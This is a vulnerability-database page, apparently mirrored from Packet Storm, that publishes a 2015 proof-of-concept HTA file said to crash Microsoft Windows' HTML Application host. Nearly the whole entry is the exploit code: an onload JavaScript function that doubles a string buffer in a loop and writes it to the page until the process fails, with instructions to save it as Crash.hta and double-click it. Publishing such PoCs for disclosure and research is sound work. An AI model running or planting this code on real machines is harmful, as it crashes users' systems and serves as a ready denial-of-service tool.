Lucene search
K

Microsoft Windows HTA Crash Proof Of Concept

🗓️ 07 Jun 2015 00:00:00Reported by Mohammad Reza EsparghamType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

Microsoft Windows HTA Crash Proof Of Concep

Code
`/*  
#[+] Author: Mohammad Reza Espargham  
#[+] Title: MS Windows HTA (HTML Aplication) - Crash PoC  
#[+] Date: 19-05-2015  
#[+] Tested on: Win7  
dash>  
save below code as Crash.hta file and Double Click on it ;) Crash...  
*/  
<html>  
<title>Mohammad Reza Espargham</title>  
</br>  
<body onload="javascript:ReZa();"></body>  
  
<script>  
function ReZa() {  
  
var buffer = '\x43';  
var buffer1 = '\x42';  
var buffer2 = '\x41';  
for (i =0;i<956;i++) {  
buffer+=buffer+'\x42';  
document.write('<>'+buffer+buffer1+buffer2);  
}}  
</script>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation